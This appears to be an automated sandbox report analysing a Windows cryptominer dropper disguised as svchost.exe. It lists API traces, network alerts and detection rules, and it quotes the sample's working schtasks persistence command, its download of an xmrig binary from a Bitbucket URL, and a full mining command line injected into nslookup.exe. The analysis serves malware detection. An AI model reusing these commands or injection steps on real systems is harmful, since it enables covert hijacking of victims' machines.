Summary | ZeroBOX

svchost.exe

Generic Malware Code injection Socket Escalate privileges Create Service KeyLogger DNS PE64 AntiDebug BitCoin PE File AntiVM
Category FILE
Machine s1_win7_x6401
Started Aug. 15, 2021, 12:33 p.m.
Completed Aug. 15, 2021, 12:40 p.m.
Size 42.0KB
Type PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5 4197eeb783ac6250fe918d469d0805f0
SHA256 f43b25a5501033f574f0467cdf7534f50cdbec94c3d8a173a80ee9f54fce55eb
CRC32 F4B56224
ssdeep 768:g2khNnCxRoB30kHmiCvkSrFJV+0JqK6ecvMIcfat30Qi9EW3tyC+eJK:IfCxRoB3H33Sh+0MEc0xAkVftTJK
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Generic_Malware_Zero - Generic Malware

IP Address Status Action
104.192.141.1 Active Moloch
131.153.76.130 Active Moloch
164.124.101.2 Active Moloch
185.65.135.248 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49204 -> 185.65.135.248:58899 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 104.192.141.1:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2 192.168.56.101:49205 -> 104.192.141.1:443
  Issuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA
  Subject: unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org
  Fingerprint: 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0
TLS 1.2 192.168.56.101:49204 -> 185.65.135.248:58899
  Issuer: C=US, O=Let's Encrypt, CN=R3
  Subject: CN=sanctam.net
  Fingerprint: 38:bc:f2:94:62:8a:02:9e:90:64:d5:0f:bc:00:83:12:36:86:2c:2a
TLS 1.3 192.168.56.101:49208 -> 131.153.76.130:80
  Issuer: None
  Subject: None
  Fingerprint: None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "svchost" has successfully been created.
console_handle: 0x0000000000000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig
request GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000007b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1321000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef19bb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002140000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002260000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b9a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c4c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b9b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91baa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cc7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91d02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2020
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description sihost64.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
file C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .text: size_of_data 0x0000a000, virtual_address 0x00002000, virtual_size 0x00009f70, entropy 7.922992522731928 description A section with a high entropy has been found
entropy 0.963855421687 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000234
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0

Process32NextW

snapshot_handle: 0x0000000000000128
process_name: taskhost.exe
process_identifier: 2140
0 0
url https://xmrig.com/wizard
url https://xmrig.com/benchmark/%s
url https://xmrig.com/docs/algorithms
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Perform crypto currency mining rule BitCoin
description Escalate privileges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Checks for the presence of known debug tools rule anti_dbgtools
description Bypass DEP rule disable_dep
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=49XarhMHsp18ZAs9SiucnGHv3LcK7qChbLKquEQftqmbXayAcpYVdHr5Dy6Z7n8EKeKJzjDcms3dJfpC2S2jMGLcFaWBZHG --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 872
region_size: 7745536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000324
1 0 0
cmdline schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
cmdline cmd /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\WR64.sys
desired_access: 983551
service_handle: 0x00000000225b16c0
error_control: 1
service_type: 1
service_manager_handle: 0x00000000225b1540
1 576394944 0
file C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: (MZ/PE executable image header; binary bytes omitted)
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: (binary code bytes; omitted)
base_address: 0x0000000140752000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: (binary code bytes; omitted)
base_address: 0x0000000140753000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: (binary data; omitted)
base_address: 0x0000000140758000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: VS_VERSION_INFO resource (StringFileInfo 000004b0): CompanyName; FileDescription Windows Configuration Manager; FileVersion 2.0.0; LegalCopyright; OriginalFilename xmrig.exe; ProductName Windows Configuration Manager; ProductVersion 2.0.0; VarFileInfo Translation; followed by the application manifest: <?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0000000140759000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x000007fffffd4010
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: (MZ/PE executable image header; binary bytes omitted)
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0
Process injection Process 2020 called NtSetContextThread to modify thread in remote process 872
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 5371802236
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1440632
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000320
process_identifier: 872
1 0 0
Process injection Process 2020 resumed a thread in remote process 872
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000320
suspend_count: 1
process_identifier: 872
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

thread_handle: 0x0000000000000138
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

thread_handle: 0x0000000000000180
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

thread_handle: 0x0000000000000220
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

thread_identifier: 2044
thread_handle: 0x0000000000000370
process_identifier: 1976
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000378
1 1 0

NtResumeThread

thread_handle: 0x0000000000000318
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

thread_identifier: 752
thread_handle: 0x00000000000003d4
process_identifier: 812
current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Libs\
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000003f0
1 1 0

NtResumeThread

thread_handle: 0x000000000000055c
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

thread_handle: 0x000000000000077c
suspend_count: 1
process_identifier: 2020
1 0 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

